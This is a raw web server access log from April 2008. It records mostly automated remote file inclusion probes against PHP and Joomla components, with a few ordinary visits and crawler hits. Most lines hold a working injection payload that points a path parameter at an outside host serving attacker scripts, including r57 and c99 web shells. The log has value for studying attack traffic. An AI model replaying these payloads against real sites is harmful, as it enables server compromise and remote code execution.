74.52.169.116 - - [06/Apr/2008:18:05:24 -0700] "GET /plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
59.126.172.129 - - [06/Apr/2008:18:06:38 -0700] "GET /logs/access_071022.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://lineagezone.hopto.org/je/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
59.126.172.129 - - [06/Apr/2008:18:06:39 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://lineagezone.hopto.org/je/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
59.126.172.129 - - [06/Apr/2008:18:06:40 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://lineagezone.hopto.org/je/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
59.126.172.129 - - [06/Apr/2008:18:06:48 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://lineagezone.hopto.org/je/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.195.51.254 - - [06/Apr/2008:18:06:57 -0700] "GET /logs/access_080407.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
200.105.35.14 - - [06/Apr/2008:18:07:49 -0700] "GET //include/main.php?config[search_disp]=true&include_dir=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:08:54 -0700] "GET /logs/access_071231.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:08:55 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:08:55 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:08:56 -0700] "GET /logs/access_071231.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:08:56 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:08:57 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.142.223.177 - - [06/Apr/2008:18:09:13 -0700] "GET //index.php/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.188.54.164 - - [06/Apr/2008:18:10:20 -0700] "GET /labia/ HTTP/1.1" 200 524 "http://www.google.com/search?q=labia&hl=en&start=220&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "www.galf.org"
206.188.54.164 - - [06/Apr/2008:18:10:21 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "www.galf.org"
206.188.54.164 - - [06/Apr/2008:18:10:25 -0700] "GET / HTTP/1.1" 200 1048 "http://www.galf.org/labia/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "www.galf.org"
84.18.207.65 - - [06/Apr/2008:18:10:46 -0700] "GET /logs/plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.18.207.65 - - [06/Apr/2008:18:10:47 -0700] "GET /plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
71.56.213.177 - - [06/Apr/2008:18:11:33 -0700] "GET /logs/access_070826.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.207.204.13 - - [06/Apr/2008:18:11:33 -0700] "GET /logs/access_080114.log//modules/xfsection/modify.php?dir_module=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
71.56.213.177 - - [06/Apr/2008:18:11:33 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
71.56.213.177 - - [06/Apr/2008:18:11:33 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
71.56.213.177 - - [06/Apr/2008:18:11:54 -0700] "GET /logs/access_070827.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:12:17 -0700] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:12:17 -0700] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
79.30.170.102 - - [06/Apr/2008:18:12:45 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
79.30.170.102 - - [06/Apr/2008:18:12:46 -0700] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:18:13:45 -0700] "GET /logs/access_080113.log/index.php?content=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:18:13:45 -0700] "GET /index.php?content=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:18:13:45 -0700] "GET /logs/index.php?content=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
71.56.213.177 - - [06/Apr/2008:18:14:05 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
71.56.213.177 - - [06/Apr/2008:18:14:05 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.58.135.90 - - [06/Apr/2008:18:14:49 -0700] "GET /logs/main.php?x=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
207.58.135.90 - - [06/Apr/2008:18:14:49 -0700] "GET /main.php?x=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
213.215.80.102 - - [06/Apr/2008:18:15:15 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
213.215.80.102 - - [06/Apr/2008:18:15:16 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
213.215.80.102 - - [06/Apr/2008:18:15:16 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
72.5.54.87 - - [06/Apr/2008:18:15:25 -0700] "GET /logs/access_070917.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.5.54.87 - - [06/Apr/2008:18:15:25 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.5.54.87 - - [06/Apr/2008:18:15:26 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.191.104.52 - - [06/Apr/2008:18:15:57 -0700] "GET /logs/access_080225.log/index.php?option=com_jcs&task=add&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.191.104.52 - - [06/Apr/2008:18:15:57 -0700] "GET /logs/index.php?option=com_jcs&task=add&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.89.191.68 - - [06/Apr/2008:18:15:59 -0700] "GET /logs/access_070827.log//modules/My_eGallery/index.php?basepath=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.5.54.87 - - [06/Apr/2008:18:16:02 -0700] "GET /logs/access_071014.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:16:08 -0700] "GET /logs/access_071224.log/index.php?principal=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:16:09 -0700] "GET /index.php?principal=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:16:09 -0700] "GET /logs/index.php?principal=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.139.131.212 - - [06/Apr/2008:18:16:18 -0700] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.139.131.212 - - [06/Apr/2008:18:16:18 -0700] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:16:25 -0700] "GET /logs/access.log/index.php?principal=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
74.220.215.233 - - [06/Apr/2008:18:16:25 -0700] "GET /index.php?principal=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
74.220.215.233 - - [06/Apr/2008:18:16:25 -0700] "GET /logs/index.php?principal=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
85.37.186.93 - - [06/Apr/2008:18:16:30 -0700] "GET /logs/access_071231.log//components/com_simpleboard/image_upload.php?sbp=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.37.186.93 - - [06/Apr/2008:18:16:31 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.37.186.93 - - [06/Apr/2008:18:16:32 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:17:39 -0700] "GET /logs/access_080113.log/index.php?doc=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:17:39 -0700] "GET /index.php?doc=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:17:39 -0700] "GET /logs/index.php?doc=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.191.104.52 - - [06/Apr/2008:18:17:43 -0700] "GET /logs/access_071231.log/index.php?option=com_jcs&task=add&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
79.30.170.102 - - [06/Apr/2008:18:17:47 -0700] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.58.135.90 - - [06/Apr/2008:18:17:54 -0700] "GET /index.php?page=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
207.58.135.90 - - [06/Apr/2008:18:17:54 -0700] "GET /logs/index.php?page=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
91.185.193.90 - - [06/Apr/2008:18:17:55 -0700] "GET /logs/access.log//includes/functions_portal.php?phpbb_root_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
91.185.193.90 - - [06/Apr/2008:18:17:55 -0700] "GET //includes/functions_portal.php?phpbb_root_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
91.185.193.90 - - [06/Apr/2008:18:17:55 -0700] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
79.30.170.102 - - [06/Apr/2008:18:18:01 -0700] "GET /logs/access_080310.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
79.30.170.102 - - [06/Apr/2008:18:18:02 -0700] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
79.30.170.102 - - [06/Apr/2008:18:18:03 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
71.56.213.177 - - [06/Apr/2008:18:18:10 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:18:58 -0700] "GET /logs/access_071015.log/index.php?arquivo=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:18:58 -0700] "GET /index.php?arquivo=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:18:59 -0700] "GET /logs/index.php?arquivo=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:19:25 -0700] "GET /logs/access_070826.log/index.php?go=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:19:25 -0700] "GET /index.php?go=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:19:25 -0700] "GET /logs/index.php?go=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:19:31 -0700] "GET /logs/access.log/index.php?arquivo=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
85.37.186.93 - - [06/Apr/2008:18:19:31 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:19:31 -0700] "GET /index.php?arquivo=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
74.220.215.233 - - [06/Apr/2008:18:19:31 -0700] "GET /logs/index.php?arquivo=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
79.30.170.102 - - [06/Apr/2008:18:19:54 -0700] "GET /logs/access_070827.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.84.7.82 - - [06/Apr/2008:18:20:01 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.lonnie.com.au/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:21:16 -0700] "GET /logs/access.log/index.php?nic=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
74.220.215.233 - - [06/Apr/2008:18:21:17 -0700] "GET /logs/index.php?nic=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
213.215.80.102 - - [06/Apr/2008:18:21:28 -0700] "GET /logs/access_080107.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.215.80.102 - - [06/Apr/2008:18:21:29 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.215.80.102 - - [06/Apr/2008:18:21:29 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:21:56 -0700] "GET /logs/access_071210.log/index.php?rage=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:21:57 -0700] "GET /index.php?rage=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:21:57 -0700] "GET /logs/index.php?rage=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.105.35.14 - - [06/Apr/2008:18:22:10 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.105.35.14 - - [06/Apr/2008:18:22:10 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
88.208.231.141 - - [06/Apr/2008:18:22:34 -0700] "GET /logs/access_070826.log/modules/My_eGallery/public/displayCategory.php?basepath=http://broomfield72.org/photos/picnic/thumbs/logo.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.208.231.141 - - [06/Apr/2008:18:22:34 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://broomfield72.org/photos/picnic/thumbs/logo.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.208.231.141 - - [06/Apr/2008:18:22:35 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://broomfield72.org/photos/picnic/thumbs/logo.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
140.120.27.17 - - [06/Apr/2008:18:22:45 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://our-tools.by.ru/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.37.186.93 - - [06/Apr/2008:18:23:09 -0700] "GET /logs/access_080114.log//components/com_simpleboard/image_upload.php?sbp=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:23:19 -0700] "GET /logs/access_070903.log/index.php?go=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
140.120.27.17 - - [06/Apr/2008:18:23:39 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://nikyr0x.altervista.org/c99.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
140.120.27.17 - - [06/Apr/2008:18:23:41 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://our-tools.by.ru/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
140.120.27.17 - - [06/Apr/2008:18:23:41 -0700] "GET //ashnews.php?pathtoashnews=http://our-tools.by.ru/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
140.120.27.17 - - [06/Apr/2008:18:23:42 -0700] "GET /logs//ashnews.php?pathtoashnews=http://our-tools.by.ru/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:23:42 -0700] "GET /logs/access.log/index.php?x=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:23:42 -0700] "GET /index.php?x=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:23:43 -0700] "GET /logs/index.php?x=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
140.120.27.17 - - [06/Apr/2008:18:23:43 -0700] "GET //ashnews.php?pathtoashnews=http://nikyr0x.altervista.org/c99.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
140.120.27.17 - - [06/Apr/2008:18:23:46 -0700] "GET /logs//ashnews.php?pathtoashnews=http://nikyr0x.altervista.org/c99.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
88.208.231.141 - - [06/Apr/2008:18:23:53 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://broomfield72.org/photos/picnic/thumbs/logo.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.55.208.228 - - [06/Apr/2008:18:23:56 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.208.228 - - [06/Apr/2008:18:23:56 -0700] "GET /tmp/?D=D HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:24:04 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:24:04 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:24:04 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
88.208.231.141 - - [06/Apr/2008:18:24:39 -0700] "GET /logs/access_070730.log/modules/My_eGallery/public/displayCategory.php?basepath=http://broomfield72.org/photos/picnic/thumbs/logo.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.64.78.58 - - [06/Apr/2008:18:25:31 -0700] "GET /logs/access_070723.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
